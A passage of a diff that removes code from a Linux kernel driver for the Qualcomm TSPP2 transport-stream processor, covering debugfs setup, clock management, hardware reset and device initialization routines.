--				S_IRUGO | S_IWUSR | S_IWGRP,
--				dentry,
--				&device->irq_stats.src[i].flow_control_stall);
--		}
--	}
--
--	dir = debugfs_create_dir("key_tables", device->debugfs_entry);
--	for (i = 0; i < TSPP2_NUM_KEYTABLES; i++) {
--		snprintf(name, 80, "key_table%02i", i);
--		dentry = debugfs_create_dir(name, dir);
--		if (dentry) {
--			debugfs_create_u32(
--				"stat_key_not_ready",
--				S_IRUGO | S_IWUSR | S_IWGRP,
--				dentry,
--				&device->irq_stats.kt[i].key_not_ready);
--		}
--	}
--
--	dir = debugfs_create_dir("pipes", device->debugfs_entry);
--	for (i = 0; i < TSPP2_NUM_PIPES; i++) {
--		snprintf(name, 80, "pipe%02i", i);
--		dentry = debugfs_create_dir(name, dir);
--		if (dentry) {
--			debugfs_create_file("threshold",
--				TSPP2_S_RW,
--				dentry,
--				base + TSPP2_PIPE_THRESH_CONFIG(i),
--				&fops_iomem_x32);
--
--			debugfs_create_file("last_address",
--				S_IRUGO,
--				dentry,
--				base + TSPP2_PIPE_LAST_ADDRESS(i),
--				&fops_iomem_x32);
--
--			debugfs_create_file("data_not_sent",
--				S_IRUGO,
--				dentry,
--				base + TSPP2_DATA_NOT_SENT_ON_PIPE(i),
--				&fops_iomem_x32);
--
--			debugfs_create_u32(
--				"stat_unexpected_reset",
--				S_IRUGO | S_IWUSR | S_IWGRP,
--				dentry,
--				&device->irq_stats.pipe[i].unexpected_reset);
--
--			debugfs_create_u32(
--				"stat_qsb_response_error",
--				S_IRUGO | S_IWUSR | S_IWGRP,
--				dentry,
--				&device->irq_stats.pipe[i].qsb_response_error);
--
--			debugfs_create_u32(
--				"stat_wrong_pipe_direction",
--				S_IRUGO | S_IWUSR | S_IWGRP,
--				dentry,
--				&device->irq_stats.pipe[i].
--							wrong_pipe_direction);
--		}
--	}
--
--	dir = debugfs_create_dir("indexing_tables", device->debugfs_entry);
--	for (i = 0; i < TSPP2_NUM_INDEXING_TABLES; i++) {
--		snprintf(name, 80, "indexing_table%i", i);
--		dentry = debugfs_create_dir(name, dir);
--		if (dentry) {
--			debugfs_create_file("prefix",
--				TSPP2_S_RW,
--				dentry,
--				base + TSPP2_INDEX_TABLE_PREFIX(i),
--				&fops_iomem_x32);
--
--			debugfs_create_file("mask",
--				TSPP2_S_RW,
--				dentry,
--				base + TSPP2_INDEX_TABLE_PREFIX_MASK(i),
--				&fops_iomem_x32);
--
--			debugfs_create_file("parameters",
--				TSPP2_S_RW,
--				dentry,
--				base + TSPP2_INDEX_TABLE_PARAMS(i),
--				&fops_iomem_x32);
--
--			for (j = 0; j < TSPP2_NUM_INDEXING_PATTERNS; j++) {
--				snprintf(name, 80, "pattern_%02i", j);
--				debugfs_create_file(name,
--					TSPP2_S_RW,
--					dentry,
--					base + TSPP2_INDEX_TABLE_PATTEREN(i, j),
--					&fops_iomem_x32);
--
--				snprintf(name, 80, "mask_%02i", j);
--				debugfs_create_file(name,
--					TSPP2_S_RW,
--					dentry,
--					base + TSPP2_INDEX_TABLE_MASK(i, j),
--					&fops_iomem_x32);
--			}
--		}
--	}
--	dir = debugfs_create_dir("software", device->debugfs_entry);
--	debugfs_create_file("device", S_IRUGO, dir, device,
--					&dbgfs_tspp2_device_fops);
--
--	dentry = debugfs_create_dir("filters", dir);
--	if (dentry) {
--		for (i = 0; i < TSPP2_NUM_AVAIL_FILTERS; i++) {
--			snprintf(name, 20, "filter%03i", i);
--			debugfs_create_file(name, S_IRUGO, dentry,
--				&(device->filters[i]), &dbgfs_filter_fops);
--		}
--	}
--
--	dentry = debugfs_create_dir("pipes", dir);
--	if (dentry) {
--		for (i = 0; i < TSPP2_NUM_PIPES; i++) {
--			snprintf(name, 20, "pipe%02i", i);
--			debugfs_create_file(name, S_IRUGO, dentry,
--					&(device->pipes[i]), &dbgfs_pipe_fops);
--		}
--	}
--
--	dentry = debugfs_create_dir("sources", dir);
--	if (dentry) {
--		for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++) {
--			snprintf(name, 20, "tsif%d", i);
--			debugfs_create_file(name, S_IRUGO, dentry,
--				&(device->tsif_sources[i]), &dbgfs_src_fops);
--		}
--		for (i = 0; i < TSPP2_NUM_MEM_INPUTS; i++) {
--			snprintf(name, 20, "mem%d", i);
--			debugfs_create_file(name, S_IRUGO, dentry,
--				&(device->mem_sources[i]), &dbgfs_src_fops);
--		}
--	}
--}
--
--/**
-- * tspp2_debugfs_exit() - TSPP2 device debugfs teardown.
-- *
-- * @device:	TSPP2 device.
-- */
--static void tspp2_debugfs_exit(struct tspp2_device *device)
--{
--	debugfs_remove_recursive(device->debugfs_entry);
--	device->debugfs_entry = NULL;
--}
--
--/**
-- *  tspp2_tsif_start() - Start TSIF device HW.
-- *
-- * @tsif_device:	TSIF device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_tsif_start(struct tspp2_tsif_device *tsif_device)
--{
--	u32 ctl;
--
--	if (tsif_device->ref_count > 0)
--		return 0;
--
--	ctl = (TSIF_STS_CTL_EN_IRQ | TSIF_STS_CTL_EN_DM |
--		TSIF_STS_CTL_PACK_AVAIL | TSIF_STS_CTL_OVERFLOW |
--		TSIF_STS_CTL_LOST_SYNC | TSIF_STS_CTL_TIMEOUT |
--		TSIF_STS_CTL_PARALLEL);
--
--	if (tsif_device->clock_inverse)
--		ctl |= TSIF_STS_CTL_INV_CLOCK;
--
--	if (tsif_device->data_inverse)
--		ctl |= TSIF_STS_CTL_INV_DATA;
--
--	if (tsif_device->sync_inverse)
--		ctl |= TSIF_STS_CTL_INV_SYNC;
--
--	if (tsif_device->enable_inverse)
--		ctl |= TSIF_STS_CTL_INV_ENABLE;
--
--	switch (tsif_device->mode) {
--	case TSPP2_TSIF_MODE_LOOPBACK:
--		ctl |= TSIF_STS_CTL_EN_NULL		|
--				TSIF_STS_CTL_EN_ERROR	|
--				TSIF_STS_CTL_TEST_MODE;
--		break;
--	case TSPP2_TSIF_MODE_1:
--		ctl |= TSIF_STS_CTL_EN_TIME_LIM | TSIF_STS_CTL_EN_TCR;
--		break;
--	case TSPP2_TSIF_MODE_2:
--		ctl |= TSIF_STS_CTL_EN_TIME_LIM		|
--				TSIF_STS_CTL_EN_TCR	|
--				TSIF_STS_CTL_MODE_2;
--		break;
--	default:
--		pr_warn("%s: Unknown TSIF mode %d, setting to TSPP2_TSIF_MODE_2\n",
--			__func__, tsif_device->mode);
--		ctl |= TSIF_STS_CTL_EN_TIME_LIM		|
--				TSIF_STS_CTL_EN_TCR	|
--				TSIF_STS_CTL_MODE_2;
--		break;
--	}
--
--	writel_relaxed(ctl, tsif_device->base + TSPP2_TSIF_STS_CTL);
--	writel_relaxed(tsif_device->time_limit,
--		  tsif_device->base + TSPP2_TSIF_TIME_LIMIT);
--	wmb();
--	writel_relaxed(ctl | TSIF_STS_CTL_START,
--		  tsif_device->base + TSPP2_TSIF_STS_CTL);
--	wmb();
--
--	ctl = readl_relaxed(tsif_device->base + TSPP2_TSIF_STS_CTL);
--	if (ctl & TSIF_STS_CTL_START)
--		tsif_device->ref_count++;
--
--	return (ctl & TSIF_STS_CTL_START) ? 0 : -EBUSY;
--}
--
--
--static int tspp2_vbif_clock_start(struct tspp2_device *device)
--{
--	int ret;
--
--	if (device->tspp2_vbif_clk) {
--		ret = clk_prepare_enable(device->tspp2_vbif_clk);
--		if (ret) {
--			pr_err("%s: Can't start tspp2_vbif_clk\n", __func__);
--			return ret;
--		}
--	}
--
--	if (device->vbif_ahb_clk) {
--		ret = clk_prepare_enable(device->vbif_ahb_clk);
--		if (ret) {
--			pr_err("%s: Can't start vbif_ahb_clk\n", __func__);
--			goto disable_vbif_tspp2;
--		}
--	}
--	if (device->vbif_axi_clk) {
--		ret = clk_prepare_enable(device->vbif_axi_clk);
--		if (ret) {
--			pr_err("%s: Can't start vbif_ahb_clk\n", __func__);
--			goto disable_vbif_ahb;
--		}
--	}
--
--	return 0;
--
--disable_vbif_ahb:
--	if (device->vbif_ahb_clk)
--		clk_disable_unprepare(device->vbif_ahb_clk);
--disable_vbif_tspp2:
--	if (device->tspp2_vbif_clk)
--		clk_disable_unprepare(device->tspp2_vbif_clk);
--
--	return ret;
--}
--
--static void tspp2_vbif_clock_stop(struct tspp2_device *device)
--{
--	if (device->tspp2_vbif_clk)
--		clk_disable_unprepare(device->tspp2_vbif_clk);
--
--	if (device->vbif_ahb_clk)
--		clk_disable_unprepare(device->vbif_ahb_clk);
--
--	if (device->vbif_axi_clk)
--		clk_disable_unprepare(device->vbif_axi_clk);
--}
--
--/**
-- * tspp2_tsif_stop() - Stop TSIF device HW.
-- *
-- * @tsif_device:	TSIF device.
-- */
--static void tspp2_tsif_stop(struct tspp2_tsif_device *tsif_device)
--{
--	if (tsif_device->ref_count == 0)
--		return;
--
--	tsif_device->ref_count--;
--
--	if (tsif_device->ref_count == 0) {
--		writel_relaxed(TSIF_STS_CTL_STOP,
--			tsif_device->base + TSPP2_TSIF_STS_CTL);
--		/*
--		 * The driver assumes that after this point the TSIF is stopped,
--		 * so a memory barrier is required to allow
--		 * further register writes.
--		 */
--		wmb();
--	}
--}
--
--/* Clock functions */
--
--static int tspp2_reg_clock_start(struct tspp2_device *device)
--{
--	int rc;
--
--	if (device->tspp2_ahb_clk &&
--		clk_prepare_enable(device->tspp2_ahb_clk) != 0) {
--		pr_err("%s: Can't start tspp2_ahb_clk\n", __func__);
--		return -EBUSY;
--	}
--
--	if (device->tspp2_core_clk &&
--		clk_prepare_enable(device->tspp2_core_clk) != 0) {
--		pr_err("%s: Can't start tspp2_core_clk\n", __func__);
--		if (device->tspp2_ahb_clk)
--			clk_disable_unprepare(device->tspp2_ahb_clk);
--		return -EBUSY;
--	}
--
--	/* Request minimal bandwidth on the bus, required for register access */
--	if (device->bus_client) {
--		rc = msm_bus_scale_client_update_request(device->bus_client, 1);
--		if (rc) {
--			pr_err("%s: Can't enable bus\n", __func__);
--			if (device->tspp2_core_clk)
--				clk_disable_unprepare(device->tspp2_core_clk);
--			if (device->tspp2_ahb_clk)
--				clk_disable_unprepare(device->tspp2_ahb_clk);
--			return -EBUSY;
--		}
--	}
--
--	return 0;
--}
--
--static int tspp2_reg_clock_stop(struct tspp2_device *device)
--{
--	/* Minimize bandwidth bus voting */
--	if (device->bus_client)
--		msm_bus_scale_client_update_request(device->bus_client, 0);
--
--	if (device->tspp2_core_clk)
--		clk_disable_unprepare(device->tspp2_core_clk);
--
--	if (device->tspp2_ahb_clk)
--		clk_disable_unprepare(device->tspp2_ahb_clk);
--
--	return 0;
--}
--
--/**
-- * tspp2_clock_start() - Enable the required TSPP2 clocks
-- *
-- * @device:	The TSPP2 device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_clock_start(struct tspp2_device *device)
--{
--	int tspp2_ahb_clk = 0;
--	int tspp2_core_clk = 0;
--	int tspp2_vbif_clk = 0;
--	int tspp2_klm_ahb_clk = 0;
--	int tsif_ref_clk = 0;
--
--	if (device == NULL) {
--		pr_err("%s: Can't start clocks, invalid device\n", __func__);
--		return -EINVAL;
--	}
--
--	if (device->tspp2_ahb_clk) {
--		if (clk_prepare_enable(device->tspp2_ahb_clk) != 0) {
--			pr_err("%s: Can't start tspp2_ahb_clk\n", __func__);
--			goto err_clocks;
--		}
--		tspp2_ahb_clk = 1;
--	}
--
--	if (device->tspp2_core_clk) {
--		if (clk_prepare_enable(device->tspp2_core_clk) != 0) {
--			pr_err("%s: Can't start tspp2_core_clk\n", __func__);
--			goto err_clocks;
--		}
--		tspp2_core_clk = 1;
--	}
--
--	if (device->tspp2_klm_ahb_clk) {
--		if (clk_prepare_enable(device->tspp2_klm_ahb_clk) != 0) {
--			pr_err("%s: Can't start tspp2_klm_ahb_clk\n", __func__);
--			goto err_clocks;
--		}
--		tspp2_klm_ahb_clk = 1;
--	}
--
--	if (device->tsif_ref_clk) {
--		if (clk_prepare_enable(device->tsif_ref_clk) != 0) {
--			pr_err("%s: Can't start tsif_ref_clk\n", __func__);
--			goto err_clocks;
--		}
--		tsif_ref_clk = 1;
--	}
--
--	/* Request Max bandwidth on the bus, required for full operation */
--	if (device->bus_client &&
--		msm_bus_scale_client_update_request(device->bus_client, 2)) {
--			pr_err("%s: Can't enable bus\n", __func__);
--			goto err_clocks;
--	}
--
--	return 0;
--
--err_clocks:
--	if (tspp2_ahb_clk)
--		clk_disable_unprepare(device->tspp2_ahb_clk);
--
--	if (tspp2_core_clk)
--		clk_disable_unprepare(device->tspp2_core_clk);
--
--	if (tspp2_vbif_clk)
--		clk_disable_unprepare(device->tspp2_vbif_clk);
--
--	if (tspp2_klm_ahb_clk)
--		clk_disable_unprepare(device->tspp2_klm_ahb_clk);
--
--	if (tsif_ref_clk)
--		clk_disable_unprepare(device->tsif_ref_clk);
--
--	return -EBUSY;
--}
--
--/**
-- * tspp2_clock_stop() - Disable TSPP2 clocks
-- *
-- * @device:	The TSPP2 device.
-- */
--static void tspp2_clock_stop(struct tspp2_device *device)
--{
--	if (device == NULL) {
--		pr_err("%s: Can't stop clocks, invalid device\n", __func__);
--		return;
--	}
--
--	/* Minimize bandwidth bus voting */
--	if (device->bus_client)
--		msm_bus_scale_client_update_request(device->bus_client, 0);
--
--	if (device->tsif_ref_clk)
--		clk_disable_unprepare(device->tsif_ref_clk);
--
--	if (device->tspp2_klm_ahb_clk)
--		clk_disable_unprepare(device->tspp2_klm_ahb_clk);
--
--	if (device->tspp2_core_clk)
--		clk_disable_unprepare(device->tspp2_core_clk);
--
--	if (device->tspp2_ahb_clk)
--		clk_disable_unprepare(device->tspp2_ahb_clk);
--}
--
--/**
-- * tspp2_filter_counters_reset() - Reset a filter's HW counters.
-- *
-- * @device:	TSPP2 device.
-- * @index:	Filter context index. Note counters are based on the context
-- *		index and not on the filter HW index.
-- */
--static void tspp2_filter_counters_reset(struct tspp2_device *device, u32 index)
--{
--	/* Reset filter counters */
--	writel_relaxed(0, device->base + TSPP2_FILTER_TSP_SYNC_ERROR(index));
--	writel_relaxed(0, device->base + TSPP2_FILTER_ERRED_TSP(index));
--	writel_relaxed(0, device->base + TSPP2_FILTER_DISCONTINUITIES(index));
--	writel_relaxed(0,
--		device->base + TSPP2_FILTER_SCRAMBLING_BITS_DISCARD(index));
--	writel_relaxed(0, device->base + TSPP2_FILTER_TSP_TOTAL_NUM(index));
--	writel_relaxed(0, device->base + TSPP2_FILTER_DISCONT_INDICATOR(index));
--	writel_relaxed(0, device->base + TSPP2_FILTER_TSP_NO_PAYLOAD(index));
--	writel_relaxed(0, device->base + TSPP2_FILTER_TSP_DUPLICATE(index));
--	writel_relaxed(0, device->base + TSPP2_FILTER_KEY_FETCH_FAILURE(index));
--	writel_relaxed(0, device->base + TSPP2_FILTER_DROPPED_PCR(index));
--	writel_relaxed(0, device->base + TSPP2_FILTER_PES_ERRORS(index));
--}
--
--/**
-- * tspp2_global_hw_reset() - Reset TSPP2 device registers to a default state.
-- *
-- * @device:		TSPP2 device.
-- * @enable_intr:	Enable specific interrupts or disable them.
-- *
-- * A helper function called from probe() and remove(), this function resets both
-- * TSIF devices' SW structures and verifies the TSIF HW is stopped. It resets
-- * TSPP2 registers to appropriate default values and makes sure to disable
-- * all sources, filters etc. Finally, it clears all interrupts and unmasks
-- * the "important" interrupts.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_global_hw_reset(struct tspp2_device *device,
--				int enable_intr)
--{
--	int i, n;
--	unsigned long rate_in_hz = 0;
--	u32 global_irq_en = 0;
--
--	if (!device) {
--		pr_err("%s: NULL device\n", __func__);
--		return -ENODEV;
--	}
--
--	/* Stop TSIF devices */
--	for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++) {
--		device->tsif_devices[i].hw_index = i;
--		device->tsif_devices[i].dev = device;
--		device->tsif_devices[i].mode = TSPP2_TSIF_MODE_2;
--		device->tsif_devices[i].clock_inverse = 0;
--		device->tsif_devices[i].data_inverse = 0;
--		device->tsif_devices[i].sync_inverse = 0;
--		device->tsif_devices[i].enable_inverse = 0;
--		device->tsif_devices[i].stat_pkt_write_err = 0;
--		device->tsif_devices[i].stat_pkt_read_err = 0;
--		device->tsif_devices[i].stat_overflow = 0;
--		device->tsif_devices[i].stat_lost_sync = 0;
--		device->tsif_devices[i].stat_timeout = 0;
--		device->tsif_devices[i].time_limit = TSPP2_TSIF_DEF_TIME_LIMIT;
--		/* Set ref_count to 1 to allow stopping HW */
--		device->tsif_devices[i].ref_count = 1;
--		/* This will reset ref_count to 0 */
--		tspp2_tsif_stop(&device->tsif_devices[i]);
--	}
--
--	/* Reset indexing table registers */
--	for (i = 0; i < TSPP2_NUM_INDEXING_TABLES; i++) {
--		writel_relaxed(0, device->base + TSPP2_INDEX_TABLE_PREFIX(i));
--		writel_relaxed(0,
--			device->base + TSPP2_INDEX_TABLE_PREFIX_MASK(i));
--		for (n = 0; n < TSPP2_NUM_INDEXING_PATTERNS; n++) {
--			writel_relaxed(0, device->base +
--					TSPP2_INDEX_TABLE_PATTEREN(i, n));
--			writel_relaxed(0,
--				device->base + TSPP2_INDEX_TABLE_MASK(i, n));
--		}
--		/* Set number of patterns to 0, prefix size to 4 by default */
--		writel_relaxed(0x00000400,
--			device->base + TSPP2_INDEX_TABLE_PARAMS(i));
--	}
--
--	/* Disable TSIF inputs. Set mode of operation to 16 batches */
--	for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++)
--		writel_relaxed((0x1 << TSIF_INPUT_SRC_CONFIG_16_BATCHES_OFFS),
--			device->base + TSPP2_TSIF_INPUT_SRC_CONFIG(i));
--
--	/* Reset source related registers and performance counters */
--	for (i = 0; i < TSPP2_NUM_ALL_INPUTS; i++) {
--		writel_relaxed(0, device->base + TSPP2_SRC_DEST_PIPES(i));
--
--		/* Set source configuration to default values */
--		writel_relaxed(TSPP2_DEFAULT_SRC_CONFIG,
--			device->base + TSPP2_SRC_CONFIG(i));
--	}
--	writel_relaxed(0x000003FF, device->base + TSPP2_SRC_TOTAL_TSP_RESET);
--	writel_relaxed(0x000003FF,
--		device->base + TSPP2_SRC_FILTERED_OUT_TSP_RESET);
--
--	/* Reset all contexts, each register handles 32 contexts */
--	for (i = 0; i < 4; i++) {
--		writel_relaxed(0xFFFFFFFF,
--			device->base + TSPP2_TSP_CONTEXT_RESET(i));
--		writel_relaxed(0xFFFFFFFF,
--			device->base + TSPP2_PES_CONTEXT_RESET(i));
--		writel_relaxed(0xFFFFFFFF,
--			device->base + TSPP2_INDEXING_CONTEXT_RESET(i));
--	}
--
--	for (i = 0; i < TSPP2_NUM_HW_FILTERS; i++) {
--		/*
--		 * Reset operations: put exit operation in all filter operations
--		 */
--		for (n = 0; n < TSPP2_MAX_OPS_PER_FILTER; n++) {
--			writel_relaxed(TSPP2_OPCODE_EXIT,
--				device->base + TSPP2_OPCODE(i, n));
--		}
--		/* Disable all HW filters */
--		writel_relaxed(0, device->base + TSPP2_FILTER_ENTRY0(i));
--		writel_relaxed(0, device->base + TSPP2_FILTER_ENTRY1(i));
--	}
--
--	for (i = 0; i < TSPP2_NUM_CONTEXTS; i++) {
--		/* Reset filter context-based counters */
--		tspp2_filter_counters_reset(device, i);
--	}
--
--	/*
--	 * Disable memory inputs. Set mode of operation to 16 batches.
--	 * Configure last batch to be associated with all memory input sources,
--	 * and add a filter to match all PIDs and drop the TS packets in the
--	 * last HW filter entry. Use the last context for this filter.
--	 */
--	for (i = 0; i < TSPP2_NUM_MEM_INPUTS; i++)
--		writel_relaxed(TSPP2_DEFAULT_MEM_SRC_CONFIG,
--			device->base + TSPP2_MEM_INPUT_SRC_CONFIG(i));
--
--	writel_relaxed(((TSPP2_NUM_CONTEXTS - 1) << FILTER_ENTRY1_CONTEXT_OFFS),
--		device->base + TSPP2_FILTER_ENTRY1((TSPP2_NUM_HW_FILTERS - 1)));
--	writel_relaxed((0x1 << FILTER_ENTRY0_EN_OFFS),
--		device->base + TSPP2_FILTER_ENTRY0((TSPP2_NUM_HW_FILTERS - 1)));
--
--	/* Reset pipe registers */
--	for (i = 0; i < TSPP2_NUM_PIPES; i++)
--		writel_relaxed(0xFFFF,
--			device->base + TSPP2_PIPE_THRESH_CONFIG(i));
--
--	writel_relaxed(0, device->base + TSPP2_PIPE_SECURITY);
--	writel_relaxed(0x7FFFFFFF,
--		device->base + TSPP2_DATA_NOT_SENT_ON_PIPE_RESET);
--
--	/* Set global configuration to default values */
--
--	/*
--	 * Default: minimum time between PCRs = 50msec, STC offset is 0,
--	 * transmit PCR on discontinuity.
--	 */
--	writel_relaxed(0x00000432, device->base + TSPP2_PCR_GLOBAL_CONFIG);
--
--	/* Set correct value according to TSPP2 clock: */
--	if (device->tspp2_core_clk) {
--		rate_in_hz = clk_get_rate(device->tspp2_core_clk);
--		writel_relaxed((rate_in_hz / MSEC_PER_SEC),
--			device->base + TSPP2_CLK_TO_PCR_TIME_UNIT);
--	} else {
--		writel_relaxed(0x00000000,
--			device->base + TSPP2_CLK_TO_PCR_TIME_UNIT);
--	}
--
--	writel_relaxed(0x00000000, device->base + TSPP2_DESC_WAIT_TIMEOUT);
--
--	/* Clear all global interrupts */
--	writel_relaxed(0xFFFF000F, device->base + TSPP2_GLOBAL_IRQ_CLEAR);
--	writel_relaxed(0x7FFFFFFF,
--			device->base + TSPP2_UNEXPECTED_RST_IRQ_CLEAR);
--	writel_relaxed(0x7FFFFFFF,
--			device->base + TSPP2_WRONG_PIPE_DIR_IRQ_CLEAR);
--	writel_relaxed(0x7FFFFFFF,
--			device->base + TSPP2_QSB_RESPONSE_ERROR_IRQ_CLEAR);
--	writel_relaxed(0xFFFFFFFF,
--			device->base + TSPP2_KEY_NOT_READY_IRQ_CLEAR);
--
--	/*
--	 * Global interrupts configuration:
--	 * Flow Control (per memory source):	Disabled
--	 * Read Failure (per memory source):	Enabled
--	 * SC_GO_LOW (aggregate):		Enabled
--	 * SC_GO_HIGH (aggregate):		Enabled
--	 * Wrong Pipe Direction (aggregate):	Enabled
--	 * QSB Response Error (aggregate):	Enabled
--	 * Unexpected Reset (aggregate):	Enabled
--	 * Key Not Ready (aggregate):		Disabled
--	 * Op Encrypt Level Error:		Enabled
--	 * PES No Sync:				Disabled (module parameter)
--	 * TSP Invalid Length:			Disabled (module parameter)
--	 * TSP Invalid AF Control:		Disabled (module parameter)
--	 */
--	global_irq_en = 0x00FF03E8;
--	if (tspp2_en_invalid_af_ctrl)
--		global_irq_en |=
--			(0x1 << GLOBAL_IRQ_TSP_INVALID_AF_OFFS);
--	if (tspp2_en_invalid_af_length)
--		global_irq_en |= (0x1 << GLOBAL_IRQ_TSP_INVALID_LEN_OFFS);
--	if (tspp2_en_pes_no_sync)
--		global_irq_en |= (0x1 << GLOBAL_IRQ_PES_NO_SYNC_OFFS);
--
--	if (enable_intr)
--		writel_relaxed(global_irq_en,
--			device->base + TSPP2_GLOBAL_IRQ_ENABLE);
--	else
--		writel_relaxed(0, device->base + TSPP2_GLOBAL_IRQ_ENABLE);
--
--	if (enable_intr) {
--		/* Enable all pipe related interrupts */
--		writel_relaxed(0x7FFFFFFF,
--			device->base + TSPP2_UNEXPECTED_RST_IRQ_ENABLE);
--		writel_relaxed(0x7FFFFFFF,
--			device->base + TSPP2_WRONG_PIPE_DIR_IRQ_ENABLE);
--		writel_relaxed(0x7FFFFFFF,
--			device->base + TSPP2_QSB_RESPONSE_ERROR_IRQ_ENABLE);
--	} else {
--		/* Disable all pipe related interrupts */
--		writel_relaxed(0,
--			device->base + TSPP2_UNEXPECTED_RST_IRQ_ENABLE);
--		writel_relaxed(0,
--			device->base + TSPP2_WRONG_PIPE_DIR_IRQ_ENABLE);
--		writel_relaxed(0,
--			device->base + TSPP2_QSB_RESPONSE_ERROR_IRQ_ENABLE);
--	}
--
--	/* Disable Key Ladder interrupts */
--	writel_relaxed(0, device->base + TSPP2_KEY_NOT_READY_IRQ_ENABLE);
--
--	/*
--	 * Clear and disable scrambling control interrupts.
--	 * Each register handles 32 filters.
--	 */
--	for (i = 0; i < 4; i++) {
--		writel_relaxed(0xFFFFFFFF,
--			device->base + TSPP2_SC_GO_HIGH_CLEAR(i));
--		writel_relaxed(0, device->base + TSPP2_SC_GO_HIGH_ENABLE(i));
--		writel_relaxed(0xFFFFFFFF,
--			device->base + TSPP2_SC_GO_LOW_CLEAR(i));
--		writel_relaxed(0, device->base + TSPP2_SC_GO_LOW_ENABLE(i));
--	}
--
--	dev_dbg(device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--
--/**
-- * tspp2_event_work_handler - Handle the work - invoke the user callback.
-- *
-- * @work:	The work information.
-- */
--static void tspp2_event_work_handler(struct work_struct *work)
--{
--	struct tspp2_event_work *event_work =
--		container_of(work, struct tspp2_event_work, work);
--	struct tspp2_event_work cb_info = *event_work;
--
--	if (mutex_lock_interruptible(&event_work->device->mutex))
--		return;
--
--	list_add_tail(&event_work->link, &event_work->device->free_work_list);
--
--	mutex_unlock(&event_work->device->mutex);
--
--	/*
--	 * Must run callback with tspp2 device mutex unlocked,
--	 * as callback might call tspp2 driver API and cause a deadlock.
--	 */
--	if (cb_info.callback)
--		cb_info.callback(cb_info.cookie, cb_info.event_bitmask);
--}
--
--/**
-- * tspp2_device_initialize() - Initialize TSPP2 device SW structures.
-- *
-- * @device:	TSPP2 device
-- *
-- * Initialize the required SW structures and fields in the TSPP2 device,
-- * including ION client creation, BAM registration, debugfs initialization etc.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_device_initialize(struct tspp2_device *device)
--{
--	int i, ret;
--
--	if (!device) {
--		pr_err("%s: NULL device\n", __func__);
--		return -ENODEV;
--	}
--
--	/* Register BAM */
--	device->bam_props.summing_threshold = 0x10;
--	device->bam_props.irq = device->bam_irq;
--	device->bam_props.manage = SPS_BAM_MGR_LOCAL;
--
--	ret = sps_register_bam_device(&device->bam_props, &device->bam_handle);
--	if (ret) {
--		pr_err("%s: failed to register BAM\n", __func__);
--		return ret;
--	}
--	ret = sps_device_reset(device->bam_handle);
--	if (ret) {
--		sps_deregister_bam_device(device->bam_handle);
--		pr_err("%s: error resetting BAM\n", __func__);
--		return ret;
--	}
--
--	spin_lock_init(&device->spinlock);
--	wakeup_source_init(&device->wakeup_src, dev_name(&device->pdev->dev));
--
--	for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++)
--		tspp2_tsif_debugfs_init(&device->tsif_devices[i]);
--
--	/*
--	 * The device structure was allocated using devm_kzalloc() so
--	 * the memory was initialized to zero. We don't need to specifically set
--	 * fields to zero, then. We only set the fields we need to, such as
--	 * batch_id.
--	 */
--
--	for (i = 0; i < TSPP2_NUM_BATCHES; i++) {
--		device->batches[i].batch_id = i;
--		device->batches[i].src = NULL;
--		INIT_LIST_HEAD(&device->batches[i].link);
--	}
--
--	/*
--	 * We set the device back-pointer in the sources, filters and pipes
--	 * databases here, so that back-pointer is always valid (instead of
--	 * setting it when opening a source, filter or pipe).
--	 */
--	for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++)
--		device->tsif_sources[i].device = device;
--
--	for (i = 0; i < TSPP2_NUM_MEM_INPUTS; i++)
--		device->mem_sources[i].device = device;
--
--	for (i = 0; i < TSPP2_NUM_AVAIL_FILTERS; i++)
--		device->filters[i].device = device;
--
--	for (i = 0; i < TSPP2_NUM_PIPES; i++)
--		device->pipes[i].device = device;
--
--	/*
--	 * Note: tsif_devices are initialized as part of tspp2_global_hw_reset()
--	 */
--
--	device->work_queue =
--			create_singlethread_workqueue(dev_name(device->dev));
--	INIT_LIST_HEAD(&device->free_work_list);
--	for (i = 0; i < TSPP2_NUM_EVENT_WORK_ELEMENTS; i++) {
--		device->work_pool[i].device = device;
--		device->work_pool[i].callback = 0;
--		device->work_pool[i].cookie = 0;
--		device->work_pool[i].event_bitmask = 0;
--		INIT_LIST_HEAD(&device->work_pool[i].link);
--		INIT_WORK(&device->work_pool[i].work,
--			tspp2_event_work_handler);
--
--		list_add_tail(&device->work_pool[i].link,
--			&device->free_work_list);
--	}
--
--	device->event_callback = NULL;
--	device->event_cookie = NULL;
--
--	dev_dbg(device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--
--/**
-- * tspp2_device_uninitialize() - TSPP2 device teardown and cleanup.
-- *
-- * @device:	TSPP2 device
-- *
-- * TSPP2 device teardown: debugfs removal, BAM de-registration etc.
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_device_uninitialize(struct tspp2_device *device)
--{
--	int i;
--
--	if (!device) {
--		pr_err("%s: NULL device\n", __func__);
--		return -ENODEV;
--	}
--
--	destroy_workqueue(device->work_queue);
--
--	for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++)
--		tspp2_tsif_debugfs_exit(&device->tsif_devices[i]);
--
--	/* Need to start clocks for BAM de-registration */
--	if (pm_runtime_get_sync(device->dev) >= 0) {
--		sps_deregister_bam_device(device->bam_handle);
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--	}
--
--	wakeup_source_trash(&device->wakeup_src);
--
--	dev_dbg(device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--
--/**
-- * tspp2_src_disable_internal() - Helper function to disable a source.
-- *
-- * @src: Source to disable.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_src_disable_internal(struct tspp2_src *src)
--{
--	u32 reg;
--
--	if (!src) {
--		pr_err("%s: Invalid source handle\n", __func__);
--		return -EINVAL;
--	}
--
--	if (!src->opened) {
--		pr_err("%s: Source not opened\n", __func__);
--		return -EINVAL;
--	}
--
--	if (!src->enabled) {
--		pr_warn("%s: Source already disabled\n", __func__);
--		return 0;
--	}
--
